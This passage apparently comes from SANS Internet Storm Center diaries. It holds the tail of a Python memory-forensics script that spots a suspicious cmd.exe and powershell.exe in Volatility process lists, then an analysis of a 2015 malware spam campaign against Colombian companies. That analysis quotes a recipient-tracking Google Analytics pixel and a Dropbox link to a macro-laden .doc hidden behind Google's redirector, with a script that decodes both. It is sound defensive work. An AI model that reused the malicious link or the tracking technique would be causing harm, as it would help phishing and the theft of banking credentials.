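COMPROMISED = BASELINE.replace("      9      412", "     12      498") + """\
0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000
"""

def parse_pslist(text):
    """Map (offset, name, pid, ppid) -> row, skipping headers and separators."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].startswith("0x"):
            continue
        entries[(parts[0], parts[1], int(parts[2]), int(parts[3]))] = line.rstrip()
    return entries

def new_entries(baseline_text, compromised_text):
    """Rows only in the compromised image. Keying on stable fields means a
    changed thread/handle count or exit time is not reported as 'new'."""
    before = parse_pslist(baseline_text)
    after = parse_pslist(compromised_text)
    return [row for key, row in after.items() if key not in before]

def launch_chain(compromised_text, rows):
    """(name, pid, ppid, parent name) per new row, exposing who spawned it."""
    name_by_pid = {key[2]: key[1] for key in parse_pslist(compromised_text)}
    chain = []
    for row in rows:
        p = row.split()
        chain.append((p[1], int(p[2]), int(p[3]), name_by_pid.get(int(p[3]), "?")))
    return chain

if __name__ == "__main__":
    for name, pid, ppid, parent in launch_chain(COMPROMISED, new_entries(BASELINE, COMPROMISED)):
        print("%s (%d) started by %s (%d)" % (name, pid, parent, ppid))
```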

Pop quiz: Under the malfind results, in the ASCII readable output dumped from the hex, what jumps out at you? First right answer to @sans_isc and @holisticinfosec in the same Tweet, one per reader, wins some insignificant yet enjoyable schwag.
Cheers!

Russ McRee | @holisticinfosec

0 Comments

Published: 2015-05-01

Massive malware spam campaign to corporate domains in Colombia

There was a massive malware spam campaign directed at corporate domains in Colombia. The following is the e-mail received:

ACH spam e-mail

Now this e-mail has two interesting aspects:

  • It tracks whether the user reads the message by invoking the Google Analytics collect API:
    img src=3Dhttp://www.google-analytics.com/c=
    ollect?v=3D1&tid=3DUA-62115737-1&cid=3Dxx@xx.com&t=3De=
    vent&ec=3Dxx@xx.com&ea=3Dopens&el=3Dxx@xx.com&cs=3Dnewsletter&cm=3Demail&cn=3D062413&cm1=3D1?/
    
  • It links to a Dropbox file, masked behind the Google URL redirection script:
    https://www.google.com/url?q=3Dhttps%3A%2F%=
    2Fwww.dropbox.com%2Fs%2Fvs5hho625v7ibw5%2FACH=5Ftransaction5721.doc%3Fdl%3D=
    1&sa=3DD&sntz=3D1&usg=3DAFQjCNFADf1fsGqdWqwSOnMC6XyLMHrL2w
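Both fragments above are quoted-printable encoded (the trailing "=" is a soft line break and "=3D" is an encoded "="), so the tracking ID and the real Dropbox destination are hidden behind two layers. The following is an added example (not from the diary) that decodes the fragments as copied from it (trailing markup dropped) and pulls out the recipient-identifying fields and the redirector's true target.

```python
# Added example, not part of the diary: decode the quoted-printable fragments
# above and expose the real destination behind the google.com/url redirector.
import quopri
from urllib.parse import urlsplit, parse_qs

# Raw fragments as they appear in the message body (quoted-printable: '=' at
# end of line is a soft break, '=3D' encodes '=', '=5F' encodes '_').
TRACKING_PIXEL_QP = (
    "http://www.google-analytics.com/c=\n"
    "ollect?v=3D1&tid=3DUA-62115737-1&cid=3Dxx@xx.com&t=3De=\n"
    "vent&ec=3Dxx@xx.com&ea=3Dopens&el=3Dxx@xx.com&cs=3Dnewsletter&cm=3Demail&cn=3D062413&cm1=3D1"
)
REDIRECT_QP = (
    "https://www.google.com/url?q=3Dhttps%3A%2F%=\n"
    "2Fwww.dropbox.com%2Fs%2Fvs5hho625v7ibw5%2FACH=5Ftransaction5721.doc%3Fdl%3D=\n"
    "1&sa=3DD&sntz=3D1&usg=3DAFQjCNFADf1fsGqdWqwSOnMC6XyLMHrL2w"
)

def decode_qp_url(fragment):
    """Undo the MIME quoted-printable transfer encoding of a URL."""
    return quopri.decodestring(fragment.encode()).decode()

def tracking_fields(url):
    """Recipient-identifying fields from a Google Analytics beacon, or None."""
    parts = urlsplit(url)
    if not parts.netloc.endswith("google-analytics.com"):
        return None
    q = parse_qs(parts.query)
    return {k: q[k][0] for k in ("tid", "cid", "ea") if k in q}

def redirect_target(url):
    """The URL a google.com/url redirector forwards to (percent-decoded), or None."""
    parts = urlsplit(url)
    if parts.netloc != "www.google.com" or parts.path != "/url":
        return None
    q = parse_qs(parts.query).get("q")
    return q[0] if q else None

if __name__ == "__main__":
    print("beacon:", tracking_fields(decode_qp_url(TRACKING_PIXEL_QP)))
    print("target:", redirect_target(decode_qp_url(REDIRECT_QP)))
```

The "cid" and "el" fields carry the recipient's address, so a single open tells the sender exactly which mailbox is live.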

When opened, this document runs an embedded Visual Basic script that downloads a known password-stealing trojan targeting Colombian banks.

This domain uses a private registration service, which hides the identity of whoever registered it:

frterminales private registration

Be careful when opening unknown e-mails. You could be leaking information and compromising your computer, even when you see a Google domain in the URLs.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web: http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

6 Comments